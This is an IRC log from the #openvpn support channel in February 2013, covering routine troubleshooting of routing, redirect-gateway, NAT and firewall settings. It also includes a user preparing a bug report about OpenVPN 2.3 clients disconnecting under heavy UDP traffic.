16:55 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Quit: Leaving]
16:56 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn
16:56 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
16:58 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn
16:58 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn
16:58 -!- hg_5_ [~chatzilla@91.234.245.245] has quit [Ping timeout: 255 seconds]
17:05 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
17:19 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
17:31 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 252 seconds]
17:31 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
17:42 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
17:43 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit []
18:06 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
18:08 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Ping timeout: 248 seconds]
18:09 -!- ppr is now known as peper
18:13 -!- sysdoc [~sysdoc@pool-71-105-40-229.lsanca.dsl-w.verizon.net] has joined #openvpn
18:14 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn
18:19 -!- p3rror [~mezgani@41.249.146.72] has joined #openvpn
18:35 -!- nutron [~nutron@unaffiliated/nutron] has quit [Remote host closed the connection]
18:39 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit
[Remote host closed the connection] 18:41 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 18:47 -!- nutron [~nutron@unaffiliated/nutron] has quit [Read error: Connection reset by peer] 18:47 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 246 seconds] 18:48 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 19:02 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 19:22 -!- spitf1r3 [~quassel@89.200.144.70] has quit [Read error: Connection reset by peer] 19:23 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 19:23 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 19:23 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 19:23 -!- mode/#openvpn [+o krzee] by ChanServ 19:26 -!- novaflash is now known as novaflash_away 19:39 -!- roboman2444 [~roboman24@unaffiliated/roboman2444] has joined #openvpn 19:39 < roboman2444> is it possible to compile a statically linked openvpn? 19:39 < roboman2444> so no lib dependencies 19:41 < EugeneKay> Yes. 
man gcc 19:42 < EugeneKay> There are also a few google results of interest for "openvpn compile static" 19:46 <@krzee> commonly used for embedded devices 20:06 <+hazardous> hi krzee~ 20:07 -!- JSharpe [~JSharpe@10-253-3-31-anc.floodtel.net] has quit [Quit: Leaving] 20:29 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit [Ping timeout: 260 seconds] 20:30 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 20:35 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has joined #openvpn 20:35 -!- clu5ter [~staff@unaffiliated/clu5ter] has quit [Read error: Connection reset by peer] 20:37 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit [Read error: Connection reset by peer] 20:38 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 20:38 -!- clu5ter [~staff@unaffiliated/clu5ter] has joined #openvpn 21:29 -!- mail323 [~mail323@c-98-254-82-94.hsd1.fl.comcast.net] has joined #openvpn 21:41 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 21:59 -!- neverme [neverme@177.182.58.82] has joined #openvpn 22:00 -!- mail323 [~mail323@c-98-254-82-94.hsd1.fl.comcast.net] has left #openvpn [] 22:00 < neverme> Is there a significant difference from using OpenVPN on tcp over udp ? for instance if all clients connecting to it have a higher download speed then they have their upload speed would having the server set on tcp be actually better in the end ? an example would be a 20mb download with 1mb upload internet 22:01 < neverme> or am I talking shit and udp will be superior in all cases or is there a specific case I will want tcp over it ? 
22:02 < neverme> I understand that tcp will wait for confirmation and stuff, while udp won't or something like that I mean I know the basics of how both work handshake etc 22:11 -!- p3rror [~mezgani@41.249.146.72] has quit [Ping timeout: 248 seconds] 22:11 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 22:13 -!- neverme [neverme@177.182.58.82] has quit [Quit: Leaving] 22:23 < EugeneKay> !fail2ban 22:23 <@vpnHelper> "fail2ban" is in linux you can replace fail2ban without the background process with something like: iptables -A INPUT -m tcp -p tcp --dport 22 -m hashlimit --hashlimit-name ssh --hashlimit-upto 5/minute --hashlimit-mode srcip --hashlimit-srcmask 24 -j ACCEPT 22:38 <@krzee> hey hazardous 22:38 <@krzee> !tcp 22:38 <@vpnHelper> "tcp" is (#1) Sometimes you cannot avoid tunneling over tcp, but if you can avoid it, DO. http://sites.inka.de/~bigred/devel/tcp-tcp.html Why TCP Over TCP Is A Bad Idea. or (#2) http://www.openvpn.net/papers/BLUG-talk/14.html for a presentation by James Yonan (OpenVPN lead developer) or (#3) if you must use tcp, you likely want --tcp-nodelay 22:45 -!- sysdoc [~sysdoc@pool-71-105-40-229.lsanca.dsl-w.verizon.net] has quit [Remote host closed the connection] 22:51 -!- dsii [allan@hijacked.us] has joined #openvpn 22:51 < dsii> !fail2ban 22:51 <@vpnHelper> "fail2ban" is in linux you can replace fail2ban without the background process with something like: iptables -A INPUT -m tcp -p tcp --dport 22 -m hashlimit --hashlimit-name ssh --hashlimit-upto 5/minute --hashlimit-mode srcip --hashlimit-srcmask 24 -j ACCEPT 22:56 <+hazardous> why is tcp over tcp bad ;o 23:00 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 252 seconds] 23:00 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 252 seconds] 23:14 < EugeneKay> Read the page 23:14 < EugeneKay> It explains it 23:54 -!- Teck7 [~teck7@bas1-montreal54-1279376358.dsl.bell.ca] has joined 
#openvpn 23:56 -!- rfxn [~teck7@69.157.154.143] has quit [Ping timeout: 248 seconds] --- Day changed Sat Feb 23 2013 00:02 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 01:10 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 02:07 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 02:16 -!- dazo_afk is now known as dazo 02:16 -!- Orbi [~opera@109.129.18.157] has joined #openvpn 02:34 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit [Read error: Connection reset by peer] 02:34 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 03:36 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 03:57 -!- Orbi [~opera@109.129.18.157] has quit [Ping timeout: 252 seconds] 03:58 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Ping timeout: 252 seconds] 04:13 -!- md_5 [md_5@mcdevs/trusted/md-5] has joined #openvpn 04:33 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 04:43 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 04:45 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Client Quit] 04:46 -!- novaflash_away is now known as novaflash 04:50 -!- discojoe [~wtf@78.157.218.55] has joined #openvpn 04:52 < discojoe> why cant i access my openvpn server ip? vpn works, i can access all web etc... except site hosted on same server vpn is run 04:53 < discojoe> do i need to add something in firewall/iptables? 04:54 < pekster> Why do you assume the vpn works? Why would accessing "all web etc" demonstrate this? 04:54 < discojoe> i can connect to vpn 04:55 < pekster> That doesn't mean you can send traffic over it necessarily. The traditional test to see if the VPN link is up is to ping the server. 
If the server drops/firewalls this traffic, you're going to have a very hard time showing that the VPN is configured correctly 04:55 < discojoe> then open everything except ip or domain that is hosted on same server 04:56 < discojoe> i can ping server 04:57 < pekster> You can ping the server's VPN IP address? 04:58 < discojoe> yes sir 04:58 < pekster> Then your VPN is working. Anything else is a routing/firewall problem 04:58 < pekster> (firewall in the case of accessing a service on the VPN IP of the server itself) 04:58 -!- FellowTraveler [~Adium@opentransactions/dev/FellowTraveler] has joined #openvpn 04:59 < discojoe> ok, so i need to allow access to server ip thru vpn 04:59 < discojoe> will start playing around with it 04:59 < discojoe> thanks pekster 04:59 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 04:59 < pekster> Apparently. You already have pings working, so "access" is relative to what you expect to do 05:00 < discojoe> i need to be able to ssh to server thru vpn 05:00 < discojoe> also access 2 website run on same server 05:00 < FellowTraveler> I've recently set up OpenVPN on a plug server, and I'm using a VPN client to connect to it, which seems to work, but when I go to WhatIsMyIP.com, it shows my actual IP address. Can anyone help me get it working for real? 05:03 < FellowTraveler> I would be able to paypal $50 to whoever is able to help me get it working. 05:03 < FellowTraveler> Or BTC. 05:04 < discojoe> FellowTraveler how do you know its connecting to vpn? 05:04 < discojoe> Can you ping vpn ip? 05:04 < FellowTraveler> I'm connecting with Viscosity and the little thing turns green 05:04 < FellowTraveler> when you say VPN IP, do you mean the external WAN IP ? 
05:06 < FellowTraveler> the plug server is on a subnet like 192.168.x.x — The VPN client is on a subnet like 10.x.x.x 05:06 < FellowTraveler> In the VPN server.conf itself, is this sort of addressing: ifconfig 172.31.0.1 172.31.0.2 05:07 < pekster> What's the goal 05:07 < pekster> !goal 05:07 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 05:07 < FellowTraveler> I want to use this plug server VPN, so I don't have to pay for VPN service anymore. 05:08 < FellowTraveler> the VPN plug server is at my brother's house in Nevada. When I am surfing the Internet, I want it to appear as if I am at my brother's house in Nevada. 05:08 < FellowTraveler> But when I connect to the VPN server, and then go to whatismyip.com, it shows my actual IP address here, instead of his external WAN address in Nevada. 05:08 < FellowTraveler> . 05:09 < FellowTraveler> I would like to have my own private VPN server, so I don't have to pay any VPN service anymore. These places charge $200 per year and I bought the plug server for $200. 05:09 < FellowTraveler> That way I should never have to use a service again. 05:09 < FellowTraveler> . 05:10 < pekster> First you need a working VPN setup where you can ping the VPN server IP. Then, follow these docs: 05:10 < pekster> !redirect 05:10 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. 
or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 05:10 <@vpnHelper> http://ircpimps.org/redirect.png 05:10 < pekster> In particular, note the flowchart that guides you through each step you need 05:10 < FellowTraveler> when you say, the VPN server IP, do you mean the external WAN IP for the router where the plug server is located? 05:10 < FellowTraveler> where I opened the UDP port 1194 to forward from the router to the plug server. 05:10 < pekster> No, the IP assigned to the VPN peer. The inside, tunneled IP 05:11 < FellowTraveler> question: if I put this in my server.conf: ifconfig 172.31.0.1 172.31.0.2 05:11 < FellowTraveler> is 172.31.0.1 the IP assigned to the VPN server? 05:12 < pekster> Yup 05:13 < FellowTraveler> okay I definitely can't ping it. 05:13 < pekster> Then your VPN is either incorrectly configured, or you are not allowing the ping request on the server in your firewall 05:14 < FellowTraveler> the only ports that are opened, are 22 and 1194 I believe 05:14 < FellowTraveler> so maybe it's still up, but just ping won't work. 05:14 < pekster> You should fix that 05:14 < FellowTraveler> I can call my brother and open the ping port, but I guess that will have to be another day 05:14 < FellowTraveler> since I am not physically at the location where the server is. 05:15 < pekster> You should generally accept all traffic coming in over the VPN interface unless there's a good reason not to; the only traffic on that interface will be secured VPN traffic 05:17 < FellowTraveler> question: 05:17 < FellowTraveler> if I have this in the server conf: 05:17 < FellowTraveler> ifconfig 172.31.0.1 172.31.0.2 05:17 < FellowTraveler> should I put something similar in client.conf ? 05:17 < FellowTraveler> I'm seeing a warning message in the logs about that being on server side only. 
05:17 < FellowTraveler> do I need to reverse the numbers or anything, and put something like that on the client side too ? 05:18 < pekster> That depends on your setup and configured mode of operation. Paste your server config, client config, and the client logs for more details 05:18 < pekster> Or see the official howto that gets you to a functional VPN setup: 05:18 < pekster> !howto 05:18 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 05:18 < pekster> In fact, the howto is probably a better place to start 05:18 < pekster> Complete that, and you should end up with a fully functional VPN. You can then add on redirect support as shown earlier 05:20 < FellowTraveler> okay I will do that, but I am pasting these anyway in case you spot something obvious 05:20 < FellowTraveler> server: http://pastebin.com/fcNS1mbK 05:20 < FellowTraveler> client: http://pastebin.com/fsurjJcU 05:21 < FellowTraveler> client log: http://pastebin.com/LTAjYfPj 05:21 < FellowTraveler> . 05:22 -!- dazo is now known as dazo_afk 05:25 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 05:26 < pekster> FellowTraveler: Lots of problems. Your client log has what are pretty self-explanatory errors on lines 9 & 10 in that log output. You're using ifconfig static addressing on the server but not the client, and the client specifies 'pull' without any relevant push statements from the server 05:26 < pekster> The howto can fix all of that by showing you how to set up a proper setup 05:28 < pekster> Actually, the comp-lzo warning can safely be ignored in this case as the setting on the client is actually the default. 
It's wise, however, to match that directive on both peers 05:32 < pekster> FellowTraveler, no PMs please for support-related questions that should be kept in-channel 05:32 < pekster> If you're hell-bent on keeping your current config, you can add a matching 'ifconfig' statement on the client and reverse the IP ordering 05:32 < FellowTraveler> how about the pull ? 05:33 < pekster> No need for the 'pull' in the client, and in fact you should remove it as it conflicts with the 'redirect-gateway' statement on the server (your client has the def1 flag while the push does not) 05:33 < pekster> That, or you should remove that on the client side and push it strictly from the server; both do the same thing, although you probably want def1: 05:33 < pekster> !def1 05:33 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 05:35 < FellowTraveler> do I still need the static ifconfig, if I fix the push redirect-gateway to include def1 ? 05:35 < FellowTraveler> also, if I fix the push, do I still need the pull? 05:36 < pekster> Remove (or comment out) the push line in your server config. Then you don't need the pull either. That'll fix the discrepancy (the long story is that you are pushing that directive, and then overriding it on the client with the same directive but have added that def1 flag, so it takes priority 05:36 < pekster> Use one method or the other: not both at once. 
05:37 < FellowTraveler> Also, FYI, I performed these two steps on the server command line: 05:37 < FellowTraveler> echo "1" > /proc/sys/net/ipv4/ip_forward 05:37 < FellowTraveler> iptables -t nat -A POSTROUTING -s 172.31.0.0/24 -o eth0 -j MASQUERADE -v 05:38 < pekster> That's outside the scope of openvpn. Get your connection working first, then worry about redirection. Your firewall also needs to accept the return traffic on the FORWARD chain, although that's also outside the scope of openvpn (a networking or firewall support channel is more appropriate) 05:39 < pekster> You'll probably find helpful hints in the links the bot gave you above that is on-point with firewall config for your setup 05:42 -!- discojoe [~wtf@78.157.218.55] has left #openvpn [] 05:44 -!- nutron [~nutron@unaffiliated/nutron] has quit [Ping timeout: 256 seconds] 05:49 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 05:52 < FellowTraveler> I have to give it to you pekster, the ping is now working to the VPN server! 05:53 < FellowTraveler> unfortunately whatismyip still gives me my actual IP address instead of the VPN server's IP address. Perhaps I should turn the redirect-gateway back on? 05:53 < FellowTraveler> And in that case, I should comment-out the ifconfig ? 05:53 < FellowTraveler> in which case, how will it assign the IP address, since the ifconfig is where I was previously doing that? 05:55 -!- nutron [~nutron@unaffiliated/nutron] has quit [Max SendQ exceeded] 05:58 < pekster> Go re-read what I wrote about that redirect-gateway statement. 
Then go re-read what the bot told you 05:58 < pekster> If you disabled all occurrences of it, you didn't read carefully enough 05:59 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 06:00 -!- FellowTraveler1 [~Adium@ip72-193-210-165.lv.lv.cox.net] has joined #openvpn 06:01 < FellowTraveler1> basically I commented out the redirect-gateway on the server side, uncommented it on the client side, left the #pull commented on the client side, and put in the ifconfig routes with the numbers reversed like you advised. 06:01 < FellowTraveler1> Then I went to whatismyip.com and it showed me the Nevada IP instead of my actual IP 06:01 < pekster> Client logs report problems adding the route? 06:02 -!- FellowTraveler [~Adium@opentransactions/dev/FellowTraveler] has quit [Ping timeout: 245 seconds] 06:02 < FellowTraveler1> I don't see any, no. 06:02 < pekster> Mac on the client? 06:02 < FellowTraveler1> yes 06:03 < pekster> pastebin output from 'route' 06:03 < pekster> (once the VPN is up) 06:03 < pekster> You left your original client config line for redirect-gateway alone, yes? 06:03 < FellowTraveler1> it's up now, if I type "route" on the terminal it says: usage: route [-dnqtv] command [[modifiers] args] 06:03 < FellowTraveler1> Client: redirect-gateway def1 06:03 < FellowTraveler1> Server: irc://irc.freenode.net:6667/#push "redirect-gateway" 06:04 < FellowTraveler1> oops Server: #push "redirect-gateway" 06:04 < pekster> 'route show' or 'route print' maybe? BSD route is different than my command 06:06 < FellowTraveler1> looks like netstat -r 06:06 < FellowTraveler1> 172.31.0.1 172.31.0.2 UH 77 3 tun0 06:07 < FellowTraveler1> this is also there: 06:07 < FellowTraveler1> 128.0/1 172.31.0.1 UGSc 11 0 tun0 06:07 < FellowTraveler1> lots of others. 06:07 < pekster> Ergo the pastebin 06:07 < FellowTraveler1> very well 06:07 < pekster> 'netstat -rn' preferred for best formatting 06:07 < pekster> (assuming BSD does that... 
how I'm expecting) 06:08 < FellowTraveler1> http://pastebin.com/JUhkpyG4 06:09 < pekster> Cool, darwin now uses CIDR. I'm mildly impressed. 06:09 < FellowTraveler1> it definitely appears to be working! my traceroutes are going through the plug server 06:09 < pekster> Okay, so the redirect-gateway stuff is getting added (those are the 2 /1 routes) 06:14 -!- ||arifaX [~quassel@unaffiliated/arifax/x-427475] has joined #openvpn 06:15 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 06:16 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 06:21 -!- dazo_afk is now known as dazo 06:23 -!- FellowTraveler1 [~Adium@ip72-193-210-165.lv.lv.cox.net] has quit [Ping timeout: 256 seconds] 06:43 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 06:44 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 264 seconds] 06:45 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 
06:47 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 06:58 -!- brute11k [~brute11k@89.249.235.210] has quit [Ping timeout: 244 seconds] 07:01 -!- brute11k [~brute11k@89.249.235.210] has joined #openvpn 07:03 -!- master_of_master [~master_of@p57B55327.dip.t-dialin.net] has quit [Read error: Operation timed out] 07:06 -!- master_of_master [~master_of@p57B52F92.dip.t-dialin.net] has joined #openvpn 07:12 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 07:18 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 07:18 -!- p3rror [~mezgani@41.248.222.112] has joined #openvpn 07:36 -!- ||arifaX [~quassel@unaffiliated/arifax/x-427475] has quit [Remote host closed the connection] 07:47 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 07:47 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 08:27 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 252 seconds] 08:28 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 252 seconds] 08:29 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Quit: Ex-Chat] 08:33 < kisom> So, how do I create a bug report? 08:33 < kisom> I have an account and everything, but I see no button that allows me to submit a new report. 08:33 < pekster> Should be a "new bug" button 08:33 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 08:33 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 08:35 < kisom> Ah yes, found it. Awesome. 08:36 < pekster> I haven't had time to poke at your issue, but if you have a filed bugreport I'll add any findings there if I'm able to reproduce/confirm/analyze code for it 08:36 < kisom> Great. I'm going to do one last attempt at reproducing the bug at a freshly installed machine. Just to be sure. 
08:37 < pekster> It helps if you can be very specific about the reproduction, and ideally get any configs demonstrating it down to their most simple form 08:38 < kisom> Yes, my plan is to post complete configuration files that anyone can just run and reproduce the issue with. 08:38 < pekster> Yup, perfect 08:38 < pekster> It makes devs happy when they can just drop in a well-written bugreport and reproduction code and have it show the issue (and that means more likely to get attention) 08:39 < kisom> I assume this should be of major priority. 08:39 < pekster> Details like OS and build number (Windows in particular is up to build I004 now) are possibly also relevant 08:40 < pekster> ovpn build, not win OS build, that is 08:40 < pekster> Yea, if you can reliably crash the client by flooding data, I'd call that a 'major' big 08:40 < pekster> bug* 08:47 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 08:47 -!- mode/#openvpn [+v s7r] by ChanServ 08:50 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 252 seconds] 08:50 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 252 seconds] 08:57 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Ping timeout: 248 seconds] 09:01 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 09:03 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn 09:15 -!- krad [~m@212.40.139.131] has joined #openvpn 09:15 -!- krad [~m@212.40.139.131] has quit [Changing host] 09:15 -!- krad [~m@unaffiliated/krad] has joined #openvpn 09:16 -!- krad [~m@unaffiliated/krad] has left #openvpn [] 09:20 -!- digilink [~digilink@unaffiliated/digilink] has quit [Remote host closed the connection] 09:21 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 09:37 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 244 seconds] 09:38 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined 
#openvpn 09:45 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Ping timeout: 248 seconds] 09:46 -!- dazo is now known as dazo_afk 09:59 -!- emmanuelux [~emmanuelu@94.23.150.162] has joined #openvpn 10:05 -!- dazo_afk is now known as dazo 10:14 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Ping timeout: 248 seconds] 10:17 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 10:19 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn 10:47 -!- emmanuelux [~emmanuelu@94.23.150.162] has quit [Ping timeout: 256 seconds] 11:03 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 11:33 -!- JSharpe [~JSharpe@188.227.181.234] has joined #openvpn 11:38 -!- dazo is now known as dazo_afk 11:39 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 11:41 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 11:44 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 11:57 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Ping timeout: 260 seconds] 12:10 -!- emmanuelux [~emmanuelu@94.23.150.162] has joined #openvpn 12:22 < kisom> pekster: In case you want to try out the bug I've put together client and server configs together with a CA here: https://stormhub.org/dump/vpn-test.tar.gz 12:23 < kisom> Also includes a small script to UDP flood the client machine 12:37 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 12:38 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 12:43 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 12:44 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has quit [Read error: Connection reset by peer] 12:46 -!- Devastator- [~devas@177.18.198.44] has joined #openvpn 12:47 -!- Devastator- 
[~devas@177.18.198.44] has quit [Changing host] 12:47 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn 12:48 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 264 seconds] 12:48 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 12:48 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Ping timeout: 248 seconds] 12:51 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has joined #openvpn 12:53 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has quit [Remote host closed the connection] 12:53 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has joined #openvpn 12:58 -!- Devastator- is now known as Devastator 13:11 -!- baobeiiii [~baobeiiii@192.73.244.224] has joined #openvpn 13:19 <@krzee> kisom, are you able to spoof it? does tls-auth stop you from being able to spoof it? 13:21 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 13:25 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 13:28 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 13:28 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 13:34 < kisom> krzee: It's not about spoofing, it's about a decryption issue when the server sends in a faster phase than the client can receive. 13:35 < kisom> Which leads to the client disconnecting from the server. But only in 2.3, not in 2.2. 
13:36 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 252 seconds] 13:38 -!- Devastator [~devas@177.18.198.43] has joined #openvpn 13:38 -!- Devastator [~devas@177.18.198.43] has quit [Read error: Connection reset by peer] 13:39 -!- Devastator [~devas@177.18.198.43] has joined #openvpn 13:39 -!- Devastator [~devas@177.18.198.43] has quit [Changing host] 13:39 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 13:44 <@krzee> right, but i wonder if you could do this from a 3rd location 13:44 <@krzee> since udp is connectionless and all 13:45 <@krzee> if you know the client ip, and the server info, can you dos a client's connection with what you found? 13:46 < kisom> krzee: That's not important. If I use redirect-gateway on the client and download something heavy, say a torrent, the client disconnects almost instantly after connecting. 13:46 < kisom> krzee: The UDP flood script is just to show off the bug. 13:48 < kisom> I'll do a proper bug report tomorrow. 13:50 < kisom> But in a nutshell I'm trying to say that if the server tries to deliver more data over the VPN than the connection can handle, the client reports a crypto error and disconnects. 14:07 -!- dazo_afk is now known as dazo 14:11 < dvl> ecrist: Sorry you're not BSDCan'ing this year. Working on a big party. 14:14 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 14:20 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 
14:24 -!- ade_b [~Ade@koln-5d817635.pool.mediaWays.net] has joined #openvpn 14:24 -!- ade_b [~Ade@koln-5d817635.pool.mediaWays.net] has quit [Changing host] 14:24 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 14:34 -!- oc80z [oc80z@blea.ch] has joined #openvpn 14:36 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit [] 14:40 <@krzee> kisom, it might not be important to you, but i would not say it is unimportant if you found a way to stop clients and servers from connecting to each other 14:45 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 248 seconds] 14:53 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 15:06 -!- baobeiiii [~baobeiiii@192.73.244.224] has quit [Quit: Leaving] 15:09 -!- merica [~aMERICA@75.111.74.37] has joined #openvpn 15:10 < merica> im having a problem accessing my lan resources through openvpn server setup on openwrt:http://pastebin.com/EN5Z7bRU http://pastebin.com/EYJTLc4m 15:12 < merica> anyone see how i could fix this? 
